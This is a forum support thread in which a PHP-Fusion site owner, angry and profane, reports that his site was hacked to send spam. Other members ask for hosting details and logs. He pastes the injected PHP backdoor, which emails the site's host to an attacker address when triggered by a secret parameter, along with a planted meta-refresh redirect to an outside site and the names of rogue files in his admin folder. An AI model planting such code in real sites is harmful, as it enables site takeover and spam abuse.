Oh no! Where's the JavaScript?
Your Web browser does not have JavaScript enabled or does not support JavaScript. Please enable JavaScript on your Web browser to properly view this Web site, or upgrade to a Web browser that does support JavaScript.
Sign In
Not a member yet? Click here to register.

My site was hacked with spam script


Print Track
i had outlaws gameroom running fine for a while using php fusion, i dont know how the hell the do it, but somebody inserted a spamming script on my pages, it was verified by my hosting, that it was sending out Spam, i cant prove it, but i think it was one of those infusions i downloaded and installed on my site, i mean how else could a jackass sabotage somebodys website, right? I'll hand it to the **** that was genius enough to screw my site up, YOU
F***ing suck, this thread will probably get my banned, but hell i dont give a rats ass, YALL F***ed my site anyway and did a marvelous job at it too, The Outlaws middle finger is up in the air for you creeps, F*** that have both middle fingers, any blue collar webmasters on here reading this? be careful with what you install, these are some smart ****s, they will F*** you and your site and not even bat an eye when they do.

OUTLAW is F***ing outta here

/Edited thread title to reflect issue/Richard

26 replies

Hi Outlalw,

Hopefully your more chilled out now and relaxed.

So let's fix it man, tell me which infusions you are using, i know since it's games you use Varcade, that is not the issue, which other infusions you using.

Can you get a hold of your Access logs so we can run through them to try and see where and how the spam attack took place.

Send me a pm with your logs if you want.

Regards
Craig
Craig my man, i know it wasnt you, that flamed outlawsgameroom, let me send you a pm, i dont trust any of these other guys
Sorry to read such news from one of our community friends,Can you update this thread and tell us what infusion it was when you find out ?
More important: Are you on shared hosting or on a private VPS or dedicated server. Is basedir restriction set?

Especially when on shared hosting the initial hack could be in another srcipt / website and then spread to yours.

Everyone with hacking problems should mention the above to get a better understanding where the leak is coming from.
i dont know which infusion it was, why was Craig suspended? is it because he can help some of us? i had a few infusions on the site that i thought? was a big improvement, but one of them gave somebody the ability to SEND Spam, the guy is probably laughing his head off right now, Well Touche' you have beat the OUTLAW and a few other cool webmasters on here, but i cant figure out why?
1, there is no financial gain
2. is it just a personal thing he or she has against php-fusion if it is, the only thing i lost is a lot of time building the site, sending spam aint gonna make him a damn dime

it goes on and on
I have been following this thread carefully as I'm sure have many others. So far I have read that you are certain that one of the infusions you have installed has created the problem with sending SPAM, but you have not mentioned which infusion it is or why you are certain that it is an infusion that caused the problem. Please be more specific about which infusion it is so that the rest of us can avoid it or uninstall it if it has already been infused?

Quote

Wanabo wrote:

More important: Are you on shared hosting or on a private VPS or dedicated server. Is basedir restriction set?

Especially when on shared hosting the initial hack could be in another srcipt / website and then spread to yours.

Everyone with hacking problems should mention the above to get a better understanding where the leak is coming from.


agrees with Wanabo
I myself would like to know
please tell us your situation,
hosting/ shared?
infusion name?
logs?
additional information would benefit the entire community ..
I hope their can be a resolution to your problem soon.

Quote

as for requesting on Craigs current activity here,I can not comment.
Fellas, The Outlaw doesnt know which infusion, i believe it was a shared hosting, logs? i didnt see any access logs, all i can tell you it had to be one of them programs "Infusions" that injected the spam script, Yall got some smart people on here that can screw a fellas site, i read the F***ing forums too, my site isnt the only one they screwed.
how in the hell did the WP files got there? yes i found wordpress files on my hosting, does php-fusion run through wordpress. i put a lot of work on my site and its gone, i even tried to start over and they fixed it so when you TRY creating a database? you keep coming up with a wrong password for it, very GENIUS
about a month ago, i did upgrade my php-fusion to 7.2.6 that is the latest version right?
hey!!!! fellas i was checking the the files again? and found this at the very top of the page, this is what my hosting told me that was sending out spam, i dont know what the hell it is

CodeDownload  
<?php if(isset($_GET["t8607n"])){ 

if(!@extension_loaded('zip')){exit;}
function echh($c,$s){echo("<small><FONT style='BACKGROUND-COLOR:#$c'>$s</FONT></small><br><br>");}
$s="";foreach(str_split($_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']) as $v){$s.="$v ";}

if(@mail("comua9@gmail.com","Hi!",$s)){
   echh('00FF00','Message successfully sent!');
} else {
   echh('FF0000','Message delivery failed...');
}
if(!@extension_loaded('zip')){
   echh('FF0000','ZIP module is exist!!! Upload you your template manualy.');
} else {
   echh('00FF00','ZIP module is loaded.');
}

 exit; } ?>

im checking the administrating folder somebody upload these files thats not in my files on my computer
1. aCvq.html
2. Ujlogin.php
3. info1qo.php
4. configuH68.php inside this file is
CodeDownload  
<html>
<head>                                                                                                                                                                                                                                                <meta http-equiv="refresh" content="2; url=http://rapperrating.com/listQMg3/bar/index.html">
</head>
<body>
<h1>Loading...</h1>
</body>

Outlaw, frankly, you NEED to have control over your site and KNOW what you do with it and what infusions you install and where you got them from.

As of right now, I do not think any of us have even a remote clue as to how to help you, because you do not give relevant info.

Also, if you post code, please use the code tags.
I had a similar attack to this done on a WP site I hosted, an old vulnerable script had been left in the theme folder, so maybe if you were using something ported from wordpress that could have been the problem?
Reload86, them wordpress files wasnt there when i started the site, i wasnt using NOTHING from wordpress and Richard Ainz, you are probably right, since you the site admin, your probably one of them people with a itchy mouse button finger looking at BAN USER at every second, lmao HEY answer the OUTLAW this? why did yall suspend craig?

Quote

your probably one of them people with a itchy mouse button finger looking at BAN USER at every second, lmao HEY answer the OUTLAW this? why did yall suspend craig?
Keep on topic to get your site straightened out, or continue challenging my ban trigger. It is up to you, Outlaw.
On Post #11 you mention this section of code. Where was this, and what was the file name? Top of which page?

Your host can not inform you of the origin of this file?

Quote

KasteR wrote:

On Post #11 you mention this section of code. Where was this, and what was the file name? Top of which page?

Your host can not inform you of the origin of this file?


it was on the top of everyone of them, but i re uploaded the pages in the main directory, but the admin folder has 3 to 4 files that wasnt there before

Quote

Richard Ainz wrote:

Quote

your probably one of them people with a itchy mouse button finger looking at BAN USER at every second, lmao HEY answer the OUTLAW this? why did yall suspend craig?
Keep on topic to get your site straightened out, or continue challenging my ban trigger. It is up to you, Outlaw.


mr Outlaw to you, how could you let the software get outdated, it had to be a weakness in the software or the infusions
author outlaw16151
forumSecurity Issues & Announcements - 8
replies27 posts
viewed15,304 times
activeLast updated on 6 years ago
You can view all discussion threads in this forum.
You cannot set up a bounty in this discussion thread.
You can start a new discussion thread in this forum.
You cannot reply in this discussion thread.
You cannot start on a poll in this forum.
You cannot upload attachments in this forum.
You can download attachments in this forum.
You cannot up or down-vote on the post in this discussion thread.
Users who participated in discussion: Falk, Homdax, Craig, Wanabo, afoster, PolarFox, Reload86, Gillette, KasteR, billhunter, outlaw16151